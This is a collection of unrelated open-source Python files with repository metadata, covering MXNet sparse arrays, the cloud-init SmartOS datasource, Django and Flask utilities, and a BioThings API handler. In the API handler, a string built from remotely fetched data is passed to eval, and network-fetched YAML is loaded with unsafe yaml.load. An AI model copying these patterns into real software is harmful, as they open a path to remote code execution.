self.log.exception( "Failed to import module" + self.watchDogsLocation + '.%s' % subClassName + '.%s' % subClassName + ': ' + str(e) )
return S_ERROR( "Failed to import module" )
try:
wd_o = getattr( wdModule, subClassName )( pid = pid,
exeThread = exeThread,
spObject = spObject,
jobCPUTime = jobCPUTime,
                                                memoryLimit = memoryLimit,
processors = processors,
jobArgs = jobArgs )
return S_OK( wd_o )
except AttributeError as e:
self.log.exception( "Failed to create %s(): %s." % ( subClassName, e ) )
      return S_ERROR( "Failed to create object" )
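# A minimal usage sketch; pid, exeThread and spObject are illustrative
# placeholders, and the numeric limits are arbitrary:
#   factory = WatchdogFactory()
#   result = factory.getWatchdog( pid, exeThread, spObject,
#                                 jobCPUTime = 3600, memoryLimit = 2147483648 )
#   if result['OK']:
#     watchdog = result['Value']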
#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#
|
iw3hxn/LibrERP
|
mrp_bom_warning/__openerp__.py
|
Python
|
agpl-3.0
| 588
| 0.001704
|
# -*- coding: utf-8 -*-
# © 2017 Didotech srl (www.didotech.com)
{
"name": "BoM Warning",
"version": "4.0.1.2",
"depends": [
"mrp",
"base",
"product",
"warning"
],
"author": "Didotech srl",
"description": """
    This module aims to track warnings on Bills of Material.
""",
"website": "https://www.didotech.com",
"category": "Manufacture Resource Planning",
"data": [
'views/product_view.xml',
'views/mrp_bom_view.xml'
],
"demo": [],
"active": False,
"installable": True,
}
|
nap-complex/pythonPractice
|
newFile.py
|
Python
|
gpl-3.0
| 143
| 0.006993
|
#!/usr/bin/env python3
print("this is a test program to see if")
print("we can make a new file in github")
print("and push it to the hub.")
|
cwilhelm/django-teams
|
setup.py
|
Python
|
bsd-3-clause
| 1,758
| 0.001706
|
from distutils.core import setup
import os
from teams import get_version
# Compile the list of packages available, because distutils doesn't have
# an easy way to do this.
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('teams'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
prefix = dirpath[13:] # Strip "teams/" or "teams\"
for f in filenames:
data_files.append(os.path.join(prefix, f))
setup(name='django-teams',
version=get_version().replace(' ', '-'),
description='django-teams',
author='Charly Wilhelm',
author_email='[email protected]',
|
url='https://github.com/cwilhelm/django-teams/wiki',
download_url='https://github.com/cwilhelm/django-teams/zipball/master',
package_dir={'teams': 'teams'},
packages=packages,
package_data={'teams': data_files},
classifiers=['Development Status :: 4 - Beta',
|
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Utilities'],
)
|
madjam/mxnet
|
python/mxnet/ndarray/sparse.py
|
Python
|
apache-2.0
| 50,947
| 0.003199
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import, unused-wildcard-import, too-many-lines
"""Sparse NDArray API of MXNet."""
from __future__ import absolute_import
from __future__ import division
try:
from __builtin__ import slice as py_slice
from __builtin__ import sum as py_sum
except ImportError:
from builtins import slice as py_slice
from builtins import sum as py_sum
import ctypes
import warnings
from array import array as native_array
__all__ = ["_ndarray_cls", "csr_matrix", "row_sparse_array",
"BaseSparseNDArray", "CSRNDArray", "RowSparseNDArray"]
import numpy as np
from ..base import NotSupportedForSparseNDArray
from ..base import _LIB, numeric_types
from ..base import c_array_buf, mx_real_t, integer_types
from ..base import mx_uint, NDArrayHandle, check_call
from ..context import Context
from . import _internal
from . import op
try:
from .gen_sparse import * # pylint: disable=redefined-builtin
except ImportError:
pass
from ._internal import _set_ndarray_class
from .ndarray import NDArray, _storage_type, _DTYPE_NP_TO_MX, _DTYPE_MX_TO_NP
from .ndarray import _STORAGE_TYPE_STR_TO_ID, _STORAGE_TYPE_ROW_SPARSE, _STORAGE_TYPE_CSR
from .ndarray import _STORAGE_TYPE_UNDEFINED, _STORAGE_TYPE_DEFAULT
from .ndarray import zeros as _zeros_ndarray
from .ndarray import array as _array
try:
import scipy.sparse as spsp
except ImportError:
spsp = None
_STORAGE_AUX_TYPES = {
'row_sparse': [np.int64],
'csr': [np.int64, np.int64]
}
def _new_alloc_handle(stype, shape, ctx, delay_alloc, dtype, aux_types, aux_shapes=None):
"""Return a new handle with specified storage type, shape, dtype and context.
Empty handle is only used to hold results
Returns
-------
handle
A new empty ndarray handle
"""
hdl = NDArrayHandle()
for aux_t in aux_types:
if np.dtype(aux_t) != np.dtype("int64"):
raise NotImplementedError("only int64 is supported for aux types")
aux_type_ids = [int(_DTYPE_NP_TO_MX[np.dtype(aux_t).type]) for aux_t in aux_types]
aux_shapes = [(0,) for aux_t in aux_types] if aux_shapes is None else aux_shapes
aux_shape_lens = [len(aux_shape) for aux_shape in aux_shapes]
aux_shapes = py_sum(aux_shapes, ())
num_aux = mx_uint(len(aux_types))
check_call(_LIB.MXNDArrayCreateSparseEx(
ctypes.c_int(int(_STORAGE_TYPE_STR_TO_ID[stype])),
c_array_buf(mx_uint, native_array('I', shape)),
mx_uint(len(shape)),
ctypes.c_int(ctx.device_typeid),
ctypes.c_int(ctx.device_id),
ctypes.c_int(int(delay_alloc)),
ctypes.c_int(int(_DTYPE_NP_TO_MX[np.dtype(dtype).type])),
num_aux,
c_array_buf(ctypes.c_int, native_array('i', aux_type_ids)),
c_array_buf(mx_uint, native_array('I', aux_shape_lens)),
c_array_buf(mx_uint, native_array('I', aux_shapes)),
ctypes.byref(hdl)))
return hdl
class BaseSparseNDArray(NDArray):
"""The base class of an NDArray stored in a sparse storage format.
See CSRNDArray and RowSparseNDArray for more details.
"""
def __repr__(self):
"""Returns a string representation of the sparse array."""
shape_info = 'x'.join(['%d' % x for x in self.shape])
# The data content is not displayed since the array usually has big shape
return '\n<%s %s @%s>' % (self.__class__.__name__,
shape_info, self.context)
def __iadd__(self, other):
raise NotImplementedError()
def __isub__(self, other):
raise NotImplementedError()
def __imul__(self, other):
raise NotImplementedError()
def __idiv__(self, other):
raise NotImplementedError()
def __itruediv__(self, other):
raise NotImplementedError()
def _sync_copyfrom(self, source_array):
raise NotImplementedError()
def _at(self, idx):
raise NotSupportedForSparseNDArray(self._at, '[idx]', idx)
def _slice(self, start, stop):
raise NotSupportedForSparseNDArray(self._slice, None, start, stop)
def reshape(self, shape):
raise NotSupportedForSparseNDArray(self.reshape, None, shape)
@property
def size(self):
# the `size` for a sparse ndarray is ambiguous, hence disabled.
raise NotImplementedError()
def _aux_type(self, i):
"""Data-type of the array's ith aux data.
Returns
-------
numpy.dtype
This BaseSparseNDArray's aux data type.
"""
aux_type = ctypes.c_int()
check_call(_LIB.MXNDArrayGetAuxType(self.handle, i, ctypes.byref(aux_type)))
return _DTYPE_MX_TO_NP[aux_type.value]
@property
def _num_aux(self):
"""The number of aux data used to help store the sparse ndarray.
"""
return len(_STORAGE_AUX_TYPES[self.stype])
@property
def _aux_types(self):
"""The data types of the aux data for the BaseSparseNDArray.
"""
aux_types = []
num_aux = self._num_aux
for i in range(num_aux):
aux_types.append(self._aux_type(i))
return aux_types
def asnumpy(self):
"""Return a dense ``numpy.ndarray`` object with value copied from this array
"""
return self.tostype('default').asnumpy()
def astype(self, dtype):
"""Returns a copy of the array after casting to a specified type.
Parameters
----------
dtype : numpy.dtype or str
The type of the returned array.
Examples
--------
>>> x = mx.nd.sparse.zeros('row_sparse', (2,3), dtype='float32')
>>> y = x.astype('int32')
>>> y.dtype
<type 'numpy.int32'>
"""
res = zeros(shape=self.shape, ctx=self.context,
dtype=dtype, stype=self.stype)
self.copyto(res)
return res
def copyto(self, other):
"""Copies the value of this array to another array.
Parameters
----------
other : NDArray or CSRNDArray or RowSparseNDArray or Context
The destination array or context.
Returns
-------
|
NDArray or CSRNDArray or RowSparseNDArray
The copied array.
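        Examples
        --------
        A brief illustrative sketch (shapes and contexts are arbitrary):
        >>> a = mx.nd.sparse.zeros('csr', (2,3))
        >>> b = mx.nd.sparse.zeros('csr', (2,3))
        >>> b = a.copyto(b)          # copy into an existing array
        >>> c = a.copyto(mx.cpu())   # copy to a context, returning a new array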
"""
if isinstance(other, NDArray):
            if other.handle is self.handle:
warnings.warn('You are attempting to copy an array to itself', RuntimeWarning)
return
return _internal._copyto(self, out=other)
elif isinstance(other, Context):
hret = _ndarray_cls(_new_alloc_handle(self.stype, self.shape, other,
True, self.dtype, self._aux_types))
return _internal._copyto(self, out=hret)
else:
raise TypeError('copyto does not support type ' + str(type(other)))
def check_format(self, full_check=True):
"""Check whether the NDArray format is valid.
Parameters
----------
full_check : bool, optional
If `True`, rigorous check, O(N) operations. Otherwise
basic check, O(1) operations (default True).
"""
check_call(_LIB.MXNDArraySyncCheckFormat(self.handle, ctypes.c_bool(full_check)))
def _data(self):
"""A deep copy NDArray of the data array associated with the BaseSparseNDArray.
Thi
|
prometheanfire/cloud-init
|
cloudinit/sources/DataSourceSmartOS.py
|
Python
|
gpl-3.0
| 29,325
| 0
|
# vi: ts=4 expandtab
#
# Copyright (C) 2013 Canonical Ltd.
#
# Author: Ben Howard <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Datasource for provisioning on SmartOS. This works on Joyent
# and public/private Clouds using SmartOS.
#
# SmartOS hosts use a serial console (/dev/ttyS1) on KVM Linux Guests
# The meta-data is transmitted via key/value pairs made by
# requests on the console. For example, to get the hostname, you
# would send "GET hostname" on /dev/ttyS1.
# For Linux Guests running in LX-Brand Zones on SmartOS hosts
# a socket (/native/.zonecontrol/metadata.sock) is used instead
# of a serial console.
#
# Certain behavior is defined by the DataDictionary
# http://us-east.manta.joyent.com/jmc/public/mdata/datadict.html
# Comments with "@datadictionary" are snippets of the definition
import base64
import binascii
import json
import os
import random
import re
import socket
from cloudinit import log as logging
from cloudinit import serial
from cloudinit import sources
from cloudinit import util
LOG = logging.getLogger(__name__)
SMARTOS_ATTRIB_MAP = {
# Cloud-init Key : (SmartOS Key, Strip line endings)
'instance-id': ('sdc:uuid', True),
'local-hostname': ('hostname', True),
'public-keys': ('root_authorized_keys', True),
'user-script': ('user-script', False),
'legacy-user-data': ('user-data', False),
'user-data': ('cloud-init:user-data', False),
'iptables_disable': ('iptables_disable', True),
'motd_sys_info': ('motd_sys_info', True),
'availability_zone': ('sdc:datacenter_name', True),
'vendor-data': ('sdc:vendor-data', False),
'operator-script': ('sdc:operator-script', False),
'hostname': ('sdc:hostname', True),
'dns_domain': ('sdc:dns_domain', True),
}
SMARTOS_ATTRIB_JSON = {
# Cloud-init Key : (SmartOS Key known JSON)
'network-data': 'sdc:nics',
'dns_servers': 'sdc:resolvers',
'routes': 'sdc:routes',
}
SMARTOS_ENV_LX_BRAND = "lx-brand"
SMARTOS_ENV_KVM = "kvm"
DS_NAME = 'SmartOS'
DS_CFG_PATH = ['datasource', DS_NAME]
NO_BASE64_DECODE = [
'iptables_disable',
'motd_sys_info',
'root_authorized_keys',
'sdc:datacenter_name',
    'sdc:uuid',
'user-data',
'user-script',
]
METADATA_SOCKFILE = '/native/.zonecontrol/metadata.sock'
SERIAL_DEVICE = '/dev/ttyS1'
SERIAL_TIMEOUT = 60
# BUILT-IN DATASOURCE CONFIGURATION
# The following is the built-in configuration. If the values
# are not set via the system configuration, then these default
# will be used:
# serial_device: which serial device to use for the meta-data
# serial_timeout: how long to wait on the device
# no_base64_decode: values which are not base64 encoded and
# are fetched directly from SmartOS, not meta-data values
# base64_keys: meta-data keys that are delivered in base64
# base64_all: with the exclusion of no_base64_decode values,
# treat all meta-data as base64 encoded
# disk_setup: describes how to partition the ephemeral drive
# fs_setup: describes how to format the ephemeral drive
#
BUILTIN_DS_CONFIG = {
'serial_device': SERIAL_DEVICE,
'serial_timeout': SERIAL_TIMEOUT,
'metadata_sockfile': METADATA_SOCKFILE,
'no_base64_decode': NO_BASE64_DECODE,
'base64_keys': [],
'base64_all': False,
'disk_aliases': {'ephemeral0': '/dev/vdb'},
}
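# A hypothetical override of the keys documented above via the system
# configuration (the ['datasource']['SmartOS'] path used by DS_CFG_PATH);
# the values shown are illustrative only:
#   datasource:
#     SmartOS:
#       serial_timeout: 120
#       base64_all: True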
BUILTIN_CLOUD_CONFIG = {
'disk_setup': {
'ephemeral0': {'table_type': 'mbr',
'layout': False,
'overwrite': False}
},
'fs_setup': [{'label': 'ephemeral0',
'filesystem': 'ext3',
'device': 'ephemeral0'}],
}
# builtin vendor-data is a boothook that writes a script into
# /var/lib/cloud/scripts/per-boot. *That* script then handles
# executing the 'operator-script' and 'user-script' files
# that cloud-init writes into /var/lib/cloud/instance/data/
# if they exist.
#
# This is all very indirect, but its done like this so that at
# some point in the future, perhaps cloud-init wouldn't do it at
# all, but rather the vendor actually provide vendor-data that accomplished
# their desires. (That is the point of vendor-data).
#
# cloud-init does cheat a bit, and write the operator-script and user-script
# itself. It could have the vendor-script do that, but it seems better
# to not require the image to contain a tool (mdata-get) to read those
# keys when we have a perfectly good one inside cloud-init.
BUILTIN_VENDOR_DATA = """\
#cloud-boothook
#!/bin/sh
fname="%(per_boot_d)s/01_smartos_vendor_data.sh"
mkdir -p "${fname%%/*}"
cat > "$fname" <<"END_SCRIPT"
#!/bin/sh
##
# This file is written as part of the default vendor data for SmartOS.
# The SmartOS datasource writes the listed file from the listed metadata key
# sdc:operator-script -> %(operator_script)s
# user-script -> %(user_script)s
#
# You can view content with 'mdata-get <key>'
#
for script in "%(operator_script)s" "%(user_script)s"; do
[ -x "$script" ] || continue
echo "executing '$script'" 1>&2
"$script"
done
END_SCRIPT
chmod +x "$fname"
"""
# @datadictionary: this is legacy path for placing files from metadata
# per the SmartOS location. It is not preferable, but is done for
# legacy reasons
LEGACY_USER_D = "/var/db"
class DataSourceSmartOS(sources.DataSource):
_unset = "_unset"
smartos_type = _unset
md_client = _unset
def __init__(self, sys_cfg, distro, paths):
sources.DataSource.__init__(self, sys_cfg, distro, paths)
self.ds_cfg = util.mergemanydict([
self.ds_cfg,
util.get_cfg_by_path(sys_cfg, DS_CFG_PATH, {}),
BUILTIN_DS_CONFIG])
self.metadata = {}
self.network_data = None
self._network_config = None
self.script_base_d = os.path.join(self.paths.get_cpath("scripts"))
self._init()
def __str__(self):
root = sources.DataSource.__str__(self)
return "%s [client=%s]" % (root, self.md_client)
def _init(self):
if self.smartos_type == self._unset:
self.smartos_type = get_smartos_environ()
if self.smartos_type is None:
self.md_client = None
if self.md_client == self._unset:
self.md_client = jmc_client_factory(
smartos_type=self.smartos_type,
metadata_sockfile=self.ds_cfg['metadata_sockfile'],
serial_device=self.ds_cfg['serial_device'],
serial_timeout=self.ds_cfg['serial_timeout'])
def _set_provisioned(self):
'''Mark the instance provisioning state as successful.
When run in a zone, the host OS will look for /var/svc/provisioning
to be renamed as /var/svc/provision_success. This should be done
after meta-data is successfully retrieved and from this point
the host considers the provision of the zone to be a success and
keeps the zone running.
'''
LOG.debug('Instance provisioning state set as successful')
svc_path = '/var/svc'
if os.path.exists('/'.join([svc_path, 'provisioning'])):
os.rename('/'.join([svc_path, 'provisioning']),
'/'.join([svc_path, 'provision_success']))
def get_data(self):
self._init()
md = {}
ud = ""
if not self.smartos_type:
LOG.debug("Not running on smartos")
return False
if not self.md_client.exists():
LOG.debug("No metadata device '%r' found for SmartOS da
|
Star2Billing/cdr-stats
|
cdr_stats/apirest/view_user.py
|
Python
|
mpl-2.0
| 1,041
| 0.001921
|
#
# CDR-Stats License
# http://www.cdr-stats.org
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Copyright (C) 2011-2015 Star2Billing S.L.
#
# The Initial Developer of the Original Code is
# Arezqui Belaid <[email protected]>
#
from django.contrib.auth.models import User
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.authentication import BasicAuthentication, SessionAuthentication
from rest_framework import viewsets
from apirest.user_serializers import UserSerializer
#from permissions import CustomObjectPermissions
class UserViewSet(viewsets.ReadOnlyModelViewSet):
"""
API endpoint that allows users to be viewed or edited.
"""
    queryset = User.objects.all()
serializer_class = UserSerializer
authentication = (BasicAuthentication, SessionAuthentication)
permission_classes = (IsAuthenticatedOrReadOnly, )
|
kevinxin90/biothings_explorer_jupyter_notebook
|
api_handler.py
|
Python
|
apache-2.0
| 7,479
| 0.00361
|
import requests
import json
import yaml
import pandas as pd
import pprint
from jsonld_processor import jsonld2nquads, fetchvalue
from utils import int2str
class SmartAPIHandler:
def __init__(self):
# description info about endpoint, bioentity and api
self.endpoint_info = {}
self.bioentity_info = {}
self.api_info = {}
self.parse_id_mapping()
self.parse_openapi()
self.relation = {}
def find_base(self, d, relation={}):
for k, v in d.items():
if isinstance(v, dict) and "@context" in v and "@base" in v["@context"]:
if v["@context"]["@base"] not in relation:
relation[v["@context"]["@base"]] = [v["@id"]]
elif v["@context"]["@base"] in relation and v["@id"] not in relation[v["@context"]["@base"]]:
relation[v["@context"]["@base"]].append(v["@id"])
elif isinstance(v, dict):
self.find_base(v,relation=relation)
return relation
'''
    This function parses the jsonld file and returns relation and output info
'''
def context2relation(self, context_url):
context = requests.get(context_url).json()
return self.find_base(context, relation={})
'''
    This function parses the openapi yml file and organizes info into endpoints and apis
'''
def parse_openapi(self):
api_list_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/API_LIST.yml'
        api_list = yaml.load(requests.get(api_list_url).content)['APIs']
# path to fetch openapi yml file for each api
        metadata_url_prefix = "https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/"
for _api in api_list:
openapi_url = metadata_url_prefix + _api['metadata']
# check if the openapi file for the api exists first
if requests.get(openapi_url).status_code == 200:
# retrieve openapi file
openapi_file = requests.get(openapi_url).content
data = yaml.load(openapi_file)
self.api_info[data['info']['title']] = {'info': data['info'], 'servers': data['servers'], 'endpoints': []}
for _name, _info in data['paths'].items():
self.endpoint_info[data['servers'][0]['url'] + _name] = _info
_output = [_item['valueType'] for _item in _info['get']['responses']['200']['x-responseValueType']]
relation = {}
if 'x-JSONLDContext' in _info['get']['responses']['200']:
relation = self.context2relation(_info['get']['responses']['200']['x-JSONLDContext'])
for _op in _output:
if _op not in relation:
relation[_op] = ['ont:is_related_to']
self.endpoint_info[data['servers'][0]['url'] + _name].update({'output': _output, 'relation': relation})
self.api_info[data['info']['title']]['endpoints'].append(data['servers'][0]['url'] + _name)
else:
print("invalid url for openapi: {}".format(openapi_url))
'''
    Construct requests params/data based on input type and value;
    only handles 'in' values of body or query.
'''
def api_call_constructor(self, uri, value, endpoint_name):
results = {}
method = type(value) == list and 'post' or 'get'
for _para in self.endpoint_info[endpoint_name][method]['parameters']:
# handle cases where input value is part of the url
if _para['in'] == 'path':
data = requests.get(endpoint_name.replace('{' + _para['name'] + '}', value))
return data
else:
# check whether the parameter is required
if _para['required']:
# if the para has a request template, then put value into the placeholder {{input}}
if 'x-requestTemplate' in _para:
for _template in _para['x-requestTemplate']:
if _template['valueType'] == 'default':
results[_para['name']] = _template['template'].replace('{{input}}', value)
elif uri == _template['valueType']:
results[_para['name']] = _template['template'].replace('{{input}}', value)
else:
results[_para['name']] = value
if type(value) != list:
data = requests.get(endpoint_name, params=results)
else:
data = requests.post(endpoint_name, data=results)
return data
'''
parse the uri_id mapping file, return a dict containing id mapping info indexed by uri
'''
def parse_id_mapping(self):
file_url = 'https://raw.githubusercontent.com/NCATS-Tangerine/translator-api-registry/kevin/ID_MAPPING.csv'
data = pd.read_csv(file_url, encoding = "ISO-8859-1")
for index, row in data.iterrows():
self.bioentity_info[row['URI']] = {'registry_identifier': row[2], 'alternative_names': row[3], 'description': row[4], 'identifier_pattern': row[5], 'preferred_name': row[1], 'type': row[6]}
return self.bioentity_info
'''
fetch an endpoint's JSON-LD context information
'''
def fetch_context(self, endpoint_name):
file_url = self.endpoint_info[endpoint_name]['get']['responses']['200']['x-JSONLDContext']
return requests.get(file_url).json()
'''
input: user-provided input/output
output: return endpoint(s) which could take the input and return the output
'''
def api_endpoint_locator(self, input, output):
endpoint_list = []
for _endpoint, _info in self.endpoint_info.items():
if input in _info['get']['parameters'][0]['x-valueType'] and output in _info['output']:
endpoint_list.append(_endpoint)
return endpoint_list
'''
make api calls based on input, endpoint
'''
def call_api(self, input, value, endpoint, output):
json_doc = self.api_call_constructor(input, value, endpoint).json()
int2str(json_doc)
if endpoint.startswith('http://myvariant.info/'):
if "_id" in json_doc:
json_doc["_id"] = json_doc["_id"].replace(':', '-')
elif "hits" in json_doc:
for _doc in json_doc["hits"]:
if "_id" in _doc:
_doc['_id'] = _doc['_id'].replace(":", "-")
output_type = self.bioentity_info[output]['type']
if output_type == 'Entity':
jsonld_context = self.fetch_context(endpoint)
json_doc.update(jsonld_context)
# parse output nquads
nquads = jsonld2nquads(json_doc)
outputs = list(set(fetchvalue(nquads, output)))
return (outputs,output_type)
else:
response = self.endpoint_info[endpoint]['get']['responses']['200']['x-responseValueType']
for _response in response:
if _response['valueType'] == output:
output_path = _response['path']
outputs_command = 'json_doc'
for _item in output_path.split('.'):
outputs_command += ('["' + _item + '"]')
outputs = eval(outputs_command)
return (outputs, output_type)
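# Hedged usage sketch (not part of the original module): the URIs and the NCBI gene id
# below are illustrative placeholders, and running this performs live HTTP requests.
if __name__ == '__main__':
    handler = SmartAPIHandler()
    # find endpoints that accept the input URI type and emit the output URI type
    endpoints = handler.api_endpoint_locator('http://identifiers.org/ncbigene/',
                                             'http://identifiers.org/uniprot/')
    for _endpoint in endpoints:
        outputs, output_type = handler.call_api('http://identifiers.org/ncbigene/', '1017',
                                                _endpoint, 'http://identifiers.org/uniprot/')
        print(outputs, output_type)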
|
dbcls/dbcls-galaxy
|
test/functional/test_metadata_editing.py
|
Python
|
mit
| 2,489
| 0.023303
|
import galaxy.model
from galaxy.model.orm import *
from base.twilltestcase import TwillTestCase
class TestMetadataEdit( TwillTestCase ):
def test_00_metadata_edit( self ):
"""test_metadata_edit: Testing metadata editing"""
self.logout()
self.login( email='[email protected]' )
self.new_history( name='Test Metadata Edit' )
global history1
history1 = galaxy.model.History.query() \
.order_by( desc( galaxy.model.History.table.c.create_time ) ).first()
self.upload_file( '1.bed' )
latest_hda = galaxy.model.HistoryDatasetAssociation.query() \
.order_by( desc( galaxy.model.HistoryDatasetAssociation.table.c.create_time ) ).first()
self.home()
# Due to twill not being able to handle the permissions forms, we'll eliminate
# DefaultHistoryPermissions prior to uploading a dataset so that the permission
# form will not be displayed on the edit attributes page.
for dp in latest_hda.dataset.actions:
dp.delete()
dp.flush()
latest_hda.dataset.refresh()
self.check_history_for_string( '1.bed' )
self.check_metadata_for_string( '1.bed uploaded file unspecified (\?) chromCol value="1" selected endCol value="3" is_strandCol value="true" checked', hid=1 )
"""test editing attributes"""
self.edit_hda_attribute_info( hda_id=str( latest_hda.id ),
new_name='Testdata',
new_info="Uploaded my file",
new_dbkey='hg16',
new_startcol='6' )
self.check_metadata_for_string( 'Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="6" selected', hid=1 )
"""test Auto-detecting attributes"""
self.auto_detect_metadata( hda_id=str( latest_hda.id ) )
self.check_metadata_for_string('Testdata bed Uploaded my file hg16 "bed" selected="yes" "startCol" value="2" selected', hid=1 )
"""test converting formats"""
self.convert_format( hda_id=str( latest_hda.id ), target_type='gff' )
self.check_metadata_for_string( '"gff" selected="yes"', hid=1 )
"""test changing data type"""
self.change_datatype( hda_id=str( latest_hda.id ), datatype='gff3' )
self.check_metadata_for_string( 'gff3', hid=1 )
self.delete_history( id=str( history1.id ) )
self.logout()
|
jmagnusson/Flask-Resize
|
tests/test_bin.py
|
Python
|
bsd-2-clause
| 2,759
| 0
|
import os
import subprocess
import pytest
import flask_resize
from .decorators import requires_redis, slow
@pytest.fixture
def env(tmpdir, redis_cache):
basedir = tmpdir
conffile = tmpdir.join('flask-resize-conf.py')
conffile.write(
"""
RESIZE_URL = 'https://example.com'
RESIZE_ROOT = '{root}'
RESIZE_REDIS_HOST = '{redis_host}'
RESIZE_REDIS_KEY = '{cache_key}'
"""
.format(
root=str(basedir).replace('\\', '\\\\'),
redis_host=redis_cache._host,
cache_key=redis_cache.key,
).strip()
)
env = os.environ.copy()
# env = dict(PATH=os.environ['PATH'])
env.update(FLASK_RESIZE_CONF=str(conffile))
return env
def run(env, *args):
return subprocess.check_output(args, env=env).decode().splitlines()
@slow
def test_bin_usage(env):
assert 'usage: flask-resize' in run(env, 'flask-resize', '--help')[0]
@slow
def test_bin_list_images_empty(env):
assert run(env, 'flask-resize', 'list', 'images') == []
@slow
def test_bin_list_has_images(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
@requires_redis
@slow
def test_bin_list_cache_empty(env, redis_cache):
assert run(env, 'flask-resize', 'list', 'cache') == []
@requires_redis
@slow
def test_bin_list_has_cache(env, redis_cache):
redis_cache.add('hello')
redis_cache.add('buh-bye')
assert set(run(env, 'flask-resize', 'list', 'cache')) == \
{'hello', 'buh-bye'}
@slow
def test_bin_clear_images(
env,
resizetarget_opts,
image1_name,
image1_data
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
run(env, 'flask-resize', 'clear', 'images')
assert run(env, 'flask-resize', 'list', 'images') == []
@requires_redis
@slow
def test_bin_clear_cache(env, redis_cache):
redis_cache.add('foo bar')
assert run(env, 'flask-resize', 'clear', 'cache') == []
@requires_redis
@slow
def test_bin_sync_cache(
env,
resizetarget_opts,
image1_name,
image1_data,
image1_key,
redis_cache
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
redis_cache.clear()
assert run(env, 'flask-resize', 'list', 'cache') == []
run(env, 'flask-resize', 'sync', 'cache')
assert run(env, 'flask-resize', 'list', 'images') == [image1_key]
|
gsnbng/erpnext
|
erpnext/healthcare/doctype/therapy_session/therapy_session_dashboard.py
|
Python
|
agpl-3.0
| 226
| 0.044248
|
from __future__ import unicode_literals
from frappe import _
def get_data():
return {
'fieldname': 'therapy_session',
'transactions': [
{
'label': _('Assessments'),
'items': ['Patient Assessment']
}
]
}
|
acampbell3000/clojure-imdb-parser
|
run.py
|
Python
|
apache-2.0
| 4,140
| 0.003623
|
#!/usr/bin/python
#
# Copyright 2012 Anthony Campbell (anthonycampbell.co.uk)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Required imports
import os, getopt, sys, re, subprocess, exceptions
# Constants
_default_output_file = "./output.txt"
_script_directory = os.path.dirname(os.path.realpath(__file__))
# Help
_help = """
Clojure IMDB Parser
__file__ [options]
Simple wrapper script for the Clojure IMDB parser.
Options:
-q --query Option which specifies the query text.
-f --file Option which writes the search result to the default output file: __default_output_file__
-o --output [path/to/file] If specified, writes the search result to the specified file.
-v --verbose Option to enable verbose output.
-h -? --help Option to display this text.
Examples:
__file__ -q "Clash of the Titans" -o output.txt
__file__ --query "Clash of the Titans" --output output.txt
"""
_help = _help.replace("__file__", __file__)
_help = _help.replace("__default_output_file__", _default_output_file)
# Main method
def main():
# Initialise variables
verbose = False
output = ""
query_term = ""
output_file = ""
latest_jar = ""
try:
opts, args = getopt.getopt(sys.argv[1:], "q:fo:?hv", ["query=", "file", "output=", "help", "verbose"])
except getopt.GetoptError as error:
# Print help information and exit:
print "\n " + str(error)
print _help
sys.exit(2)
for option, argument in opts:
if option in ("-q", "--query"):
query_term = str(argument)
elif option in ("-f", "--file"):
output_file = _default_output_file
elif option in ("-o", "--output"):
output_file = str(argument)
elif option in ("-v", "--verbose"):
verbose = True
elif option in ("-h", "--help"):
print _help
sys.exit(0)
# Check we're good to go
if query_term == None or query_term == "":
print _help
sys.exit(2)
if verbose:
print "\n Clojure IMDB Parser"
try:
# Determine newest parser
process = subprocess.Popen(["ls -r " + _script_directory + "/release | grep \"clojure-imdb-parser.*.jar\" | head -n 1"],
stdout=subprocess.PIPE, shell=True)
latest_jar, stderr = process.communicate()
process.wait()
except exceptions.Exception as error:
